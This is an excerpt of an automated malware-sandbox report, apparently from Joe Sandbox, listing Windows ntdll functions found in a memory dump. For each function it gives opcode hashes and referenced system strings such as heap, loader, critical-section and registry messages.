                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 8f86984b5ea55235f0f9f020ea099dfb6b8cde699cae2dc264f20035a903bbf1
                                                                                                                                      • Instruction ID: 24a7946dc79390e4d99c70349e166160f3d3b2a675e893a4400f2e013b325d6c
                                                                                                                                      • Opcode Fuzzy Hash: 8f86984b5ea55235f0f9f020ea099dfb6b8cde699cae2dc264f20035a903bbf1
                                                                                                                                      • Instruction Fuzzy Hash: F59002616020044245407168894490640966BE1255751C526A498A910DC569C8696665
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 14 34222f00-34222f0c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 36ff5e8a4bccbd14091cd10d71ef6861aa4d4866d6332ab914dcffbb355a7664
                                                                                                                                      • Instruction ID: 6474593acba5253b6c4086711953befa5ffa550eaf9c69ceeacdd6ef14302a2a
                                                                                                                                      • Opcode Fuzzy Hash: 36ff5e8a4bccbd14091cd10d71ef6861aa4d4866d6332ab914dcffbb355a7664
                                                                                                                                      • Instruction Fuzzy Hash: 0E90026121280442D60065684D14B07009647D0347F51C51AA4146914CC925C8656521
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 342229f0-342229fc LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 673eab4c422bc7e1386546efb3725ff2f2492fa833964ea214c668b0e82cf3f9
                                                                                                                                      • Instruction ID: eb7fa8fed5e923740f1659a5f802525af71ac6ad46d6b0831640d28cff48121f
                                                                                                                                      • Opcode Fuzzy Hash: 673eab4c422bc7e1386546efb3725ff2f2492fa833964ea214c668b0e82cf3f9
                                                                                                                                      • Instruction Fuzzy Hash: 10900475313004030505F55C070450700D747D53D5351C437F5007D10CD731CC757131
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1 34222a80-34222a8c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: a9f510d5e7e8151c1303fc73f160f151dfab64359d876310b70e854d7b44893a
                                                                                                                                      • Instruction ID: e707845a08f5e6321d7b5ee274a018d7c71f73c09f08b7e554b4350be48f4223
                                                                                                                                      • Opcode Fuzzy Hash: a9f510d5e7e8151c1303fc73f160f151dfab64359d876310b70e854d7b44893a
                                                                                                                                      • Instruction Fuzzy Hash: 949002A120300403450571584514616409B47E0245B51C426E5006950DC535C8957125
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 2 34222b10-34222b1c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 64e792db477b3fd2bdaa9236e1fc2ce835a89ba7de6020373b9d7c057d44fb38
                                                                                                                                      • Instruction ID: 3b6656483a9c2f9a021f6c02486355c15efeee52f79024607837242f0f0778da
                                                                                                                                      • Opcode Fuzzy Hash: 64e792db477b3fd2bdaa9236e1fc2ce835a89ba7de6020373b9d7c057d44fb38
                                                                                                                                      • Instruction Fuzzy Hash: 6F90027120200C02D5807158450464A009647D1345F91C41AA4017A14DCA25CA5D77A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 3 34222b90-34222b9c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 2ea03682837ff61f95f954cf3e5f3a0d06ce57c65db1272e1e828ae75b2082e0
                                                                                                                                      • Instruction ID: b1ed80d8eddd4ba0fa52961f3d2ff82f32cabb2e79fab365f6b9cec627701663
                                                                                                                                      • Opcode Fuzzy Hash: 2ea03682837ff61f95f954cf3e5f3a0d06ce57c65db1272e1e828ae75b2082e0
                                                                                                                                      • Instruction Fuzzy Hash: E090027120208C02D5106158850474A009647D0345F55C816A8416A18DC6A5C8957121
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 4 34222bc0-34222bcc LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 1c948c7b59c52864c8e1458664777e37a90b3ecfdfb68aa2c3137ba67c4a037a
                                                                                                                                      • Instruction ID: 5ed38916a8801a822c743c8aa2b06e63faf65f981728b1cfd5c87f2ca375b30c
                                                                                                                                      • Opcode Fuzzy Hash: 1c948c7b59c52864c8e1458664777e37a90b3ecfdfb68aa2c3137ba67c4a037a
                                                                                                                                      • Instruction Fuzzy Hash: 5190027120200802D50065985508646009647E0345F51D416A9016915EC675C8957131
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: $ $0
                                                                                                                                      • API String ID: 3446177414-3352262554
                                                                                                                                      • Opcode ID: c0d7c2a1eef5c97e6b9d3211dc0e76a901c3f8639e2199d2797926cb7513ac18
                                                                                                                                      • Instruction ID: 4d2ca83278b93474828ad23ab60949b87cf42ac0e2fdf5baebb09615a145a060
                                                                                                                                      • Opcode Fuzzy Hash: c0d7c2a1eef5c97e6b9d3211dc0e76a901c3f8639e2199d2797926cb7513ac18
                                                                                                                                      • Instruction Fuzzy Hash: 3C3215B1A083828FE350CF69C884B5FBBE5BB88344F44492EF599A7290D775D948CF52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 342552ED
                                                                                                                                      • 8, xrefs: 342550EE
                                                                                                                                      • corrupted critical section, xrefs: 342552CD
                                                                                                                                      • I=w, xrefs: 3425514C, 34255158
                                                                                                                                      • double initialized or corrupted critical section, xrefs: 34255313
                                                                                                                                      • undeleted critical section in freed memory, xrefs: 34255236
                                                                                                                                      • Critical section debug info address, xrefs: 3425522A, 34255339
                                                                                                                                      • Critical section address, xrefs: 34255230, 342552C7, 3425533F
                                                                                                                                      • Critical section address., xrefs: 3425530D
                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 34255215, 342552A1, 34255324
                                                                                                                                      • Address of the debug info found in the active list., xrefs: 342552B9, 34255305
                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 342552D9
                                                                                                                                      • Thread identifier, xrefs: 34255345
                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 3425534E
                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 342552C1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$I=w
                                                                                                                                      • API String ID: 0-1625034921
                                                                                                                                      • Opcode ID: bea4afdca20ae9f5afd8a7f71463a9741b9ea6add224ebd5eadd5d37fa5f3da2
                                                                                                                                      • Instruction ID: 474758026d708f2c49267cc1e72a09a4f2082515b8fd0fed78165f04ec0e29b2
                                                                                                                                      • Opcode Fuzzy Hash: bea4afdca20ae9f5afd8a7f71463a9741b9ea6add224ebd5eadd5d37fa5f3da2
                                                                                                                                      • Instruction Fuzzy Hash: DC818BB1A01748AFEB50CF94CD80BAEFBB9EB48714F204199F805B7250C774A985CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                      • Opcode ID: c1ab03aed4915826d8078230bab97f456f4bb023ad537a94647bc65971a8d6c9
                                                                                                                                      • Instruction ID: 940328b9cdfb8295a554528dd20f8cc6d2585d7bdfe99cc54b84cc9f3f51a39a
                                                                                                                                      • Opcode Fuzzy Hash: c1ab03aed4915826d8078230bab97f456f4bb023ad537a94647bc65971a8d6c9
                                                                                                                                      • Instruction Fuzzy Hash: A0D1D175900A8ADFEB05CFA8C480AAEBBF2FF4A354F04819DE445BB252C735A951CF14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                      • Opcode ID: 84b01c4b35faccd98e726252e134eca80dbfb856a06e5e105007714bc2d777b9
                                                                                                                                      • Instruction ID: c0021d1168933116db414a4311192dae81175591741bbda3bb178e172c62da22
                                                                                                                                      • Opcode Fuzzy Hash: 84b01c4b35faccd98e726252e134eca80dbfb856a06e5e105007714bc2d777b9
                                                                                                                                      • Instruction Fuzzy Hash: CA517EB65047199FE325CF148C84BAFB7ECEF84290F40491EFDA9A6280E770D644CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                      • Opcode ID: 9577307b99b9f8000dbea91a5f886a9dc1245d63fdbf75b3503d2dfb04317bb5
                                                                                                                                      • Instruction ID: d76ae675b129dd96a73b5609836034e6ae88e65551b3bcd2c640c5c6375fa35b
                                                                                                                                      • Opcode Fuzzy Hash: 9577307b99b9f8000dbea91a5f886a9dc1245d63fdbf75b3503d2dfb04317bb5
                                                                                                                                      • Instruction Fuzzy Hash: 4D91D275A01A85DFEB01DFA8C480AADFBF2FF4A350F15809DE445B7291CB359941CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 341D651C
                                                                                                                                        • Part of subcall function 341D6565: RtlDebugPrintTimes.NTDLL ref: 341D6614
                                                                                                                                        • Part of subcall function 341D6565: RtlDebugPrintTimes.NTDLL ref: 341D665F
                                                                                                                                      Strings
                                                                                                                                      • LdrpInitShimEngine, xrefs: 34239783, 34239796, 342397BF
                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 342397B9
                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34239790
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 342397A0, 342397C9
                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3423977C
                                                                                                                                      • apphelp.dll, xrefs: 341D6446
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                      • Opcode ID: dd1b3577605f34bbb903460cbc24ba13f98adebb97a396243df8542ea392b27a
                                                                                                                                      • Instruction ID: 8778411cdde197d29d617fbd54326dbb8800416778c89af84759ed56dd1ac633
                                                                                                                                      • Opcode Fuzzy Hash: dd1b3577605f34bbb903460cbc24ba13f98adebb97a396243df8542ea392b27a
                                                                                                                                      • Instruction Fuzzy Hash: 3D51D0B1A08B009FF310DF25CC90F6BBBE9EB86644F40095EF595A72A0DA30D945CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 341DD263
                                                                                                                                      • @, xrefs: 341DD2B3
                                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 341DD0E6
                                                                                                                                      • @, xrefs: 341DD24F
                                                                                                                                      • h. 4, xrefs: 3423A5D2
                                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 341DD06F
                                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 341DD136
                                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 341DD202
                                                                                                                                      • @, xrefs: 341DD09D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h. 4
                                                                                                                                      • API String ID: 0-590232057
                                                                                                                                      • Opcode ID: 26712882d516e2d8f33522e532cba9ddb5da795f45198bc5e603306e5eafbdd9
                                                                                                                                      • Instruction ID: ae7e311ef42980bbcc4b5db6fd9f49b1881f6a793e1d7539a79c3b4a2bf282a1
                                                                                                                                      • Opcode Fuzzy Hash: 26712882d516e2d8f33522e532cba9ddb5da795f45198bc5e603306e5eafbdd9
                                                                                                                                      • Instruction Fuzzy Hash: 97A149B1908745DFE321CF24C480BABB7E8FB89765F41492EE598A6240D774D908CF93
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3420D879
                                                                                                                                        • Part of subcall function 341E4779: RtlDebugPrintTimes.NTDLL ref: 341E4817
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 3446177414-1975516107
                                                                                                                                      • Opcode ID: 481aa36dcc576a62bb75f752c5c6609ad44caebf103f0f4e2167e9aba53010fd
                                                                                                                                      • Instruction ID: 5a03c6aa798849d532579a371e3bc8a1f59c5ff3093570d2704937aeabe01220
                                                                                                                                      • Opcode Fuzzy Hash: 481aa36dcc576a62bb75f752c5c6609ad44caebf103f0f4e2167e9aba53010fd
                                                                                                                                      • Instruction Fuzzy Hash: C551A975E153468FEB14CBA8C888799BBF2FB45304F608199D411BB291D7B1A986CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                      • API String ID: 0-2224505338
                                                                                                                                      • Opcode ID: 26679d1be1bb12a42eac78c639093430d548a5707cc44e530297cd142a1c8218
                                                                                                                                      • Instruction ID: 6f6fefd1cd5e66fb1f9adff3af49e7446cc6bc31c6e0f13dcdfa2b7b4ce30692
                                                                                                                                      • Opcode Fuzzy Hash: 26679d1be1bb12a42eac78c639093430d548a5707cc44e530297cd142a1c8218
                                                                                                                                      • Instruction Fuzzy Hash: F95146B6211A85EFE705CF54C8C4F2EB3A9EF096A4F12859DF402BB296CA35D950CE10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 342686BD
                                                                                                                                      • VerifierFlags, xrefs: 342688D0
                                                                                                                                      • VerifierDlls, xrefs: 3426893D
                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 3426880F
                                                                                                                                      • VerifierDebug, xrefs: 34268925
                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 342686E7
                                                                                                                                      • HandleTraces, xrefs: 3426890F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                      • Opcode ID: 6fd6b37987b18dbeb1b53fc4835a1497d09dae8b377a47de956134271e08576f
                                                                                                                                      • Instruction ID: c1c9eba3f5a39eebcd7ad56135e94016a96889292888d4b832a31190b03bf975
                                                                                                                                      • Opcode Fuzzy Hash: 6fd6b37987b18dbeb1b53fc4835a1497d09dae8b377a47de956134271e08576f
                                                                                                                                      • Instruction Fuzzy Hash: 319136B1A06712DFE311CF288884B1A77E9EB45758F45055CFC967B240CBB89C85CF9A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
